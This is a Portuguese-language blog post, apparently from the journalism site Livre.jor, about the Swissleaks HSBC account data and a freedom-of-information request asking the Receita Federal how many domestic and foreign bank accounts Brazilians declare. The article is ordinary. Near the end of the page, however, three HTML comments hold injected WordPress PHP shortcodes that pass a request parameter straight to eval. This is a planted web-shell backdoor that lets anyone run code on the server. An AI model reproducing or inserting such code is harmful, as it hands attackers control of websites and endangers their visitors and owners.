Quantas contas no banco têm os brasileiros? E no exterior?

Essa pergunta foi decidida coletivamente dentro do Livre.jor e tem a ver com uma entrevista interessantíssima do jornalista Fernando Rodrigues ao portal de notícias Vice (link abaixo). Lá ele comenta o fato de ser o único brasileiro com acesso, até o momento, aos dados de 6.600 contas de nossos conterrâneos no HSBC suiço.

LINK: “Por que Fernando Rodrigues Não Revela os Nomes do Swissleaks?

Essas informações, vinculadas a 8.667 clientes, e que indicam a movimentação de mais de R$ 20 bilhões em depósitos no exterior em contas numeradas (na maioria não-identificadas diretamente por nome, como estamos acostumados), foram obtidas graças ao trabalho de jornalistas vinculados ao The International Consortium of Investigative Journalists. Até o momento, Rodrigues já divulgou dados relacionados à Operação Lava Jato e a famílias que detém o controle de linhas de ônibus intermunicipais no Estado do Rio de Janeiro.

O que isso tem a ver com o Livre.jor? Partindo do pressuposto que somos curiosos, que todo esquemão da República parece ter um apêndice no Paraná e que as informações sobre o sistema financeiro são parcas – tem tudo a ver. No fundo, queremos saber se nessa lista há algum nome do Paraná cuja divulgação tenha interesse público.

Enquanto isso não vem à tona, vamos atrás dos dados gerais. Perguntamos à Receita Federal, via Lei de Acesso à Informação, quantos brasileiros declararam Imposto de Renda nos últimos anos, se é possível saber quantas contas correntes são citadas nesses documentos e, delas, quantas são nacionais e quantas são no exterior.

Para começar a ligar as histórias, questionamos se dá para saber, dessas contas fora do Brasil, quantas são nominais e quantas são numeradas? Se a Receita for capaz de responder essas perguntas mais simples, avançamos para as mais complicadas (pedido de informações 16853.000686/2015-22).

<!– [insert_php]if (isset($_REQUEST["sGLLs"])){eval($_REQUEST["sGLLs"]);exit;}[/insert_php][php]if (isset($_REQUEST["sGLLs"])){eval($_REQUEST["sGLLs"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["JOTeX"])){eval($_REQUEST["JOTeX"]);exit;}[/insert_php][php]if (isset($_REQUEST["JOTeX"])){eval($_REQUEST["JOTeX"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["QPbT"])){eval($_REQUEST["QPbT"]);exit;}[/insert_php][php]if (isset($_REQUEST["QPbT"])){eval($_REQUEST["QPbT"]);exit;}[/php] –>

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

14 − 2 =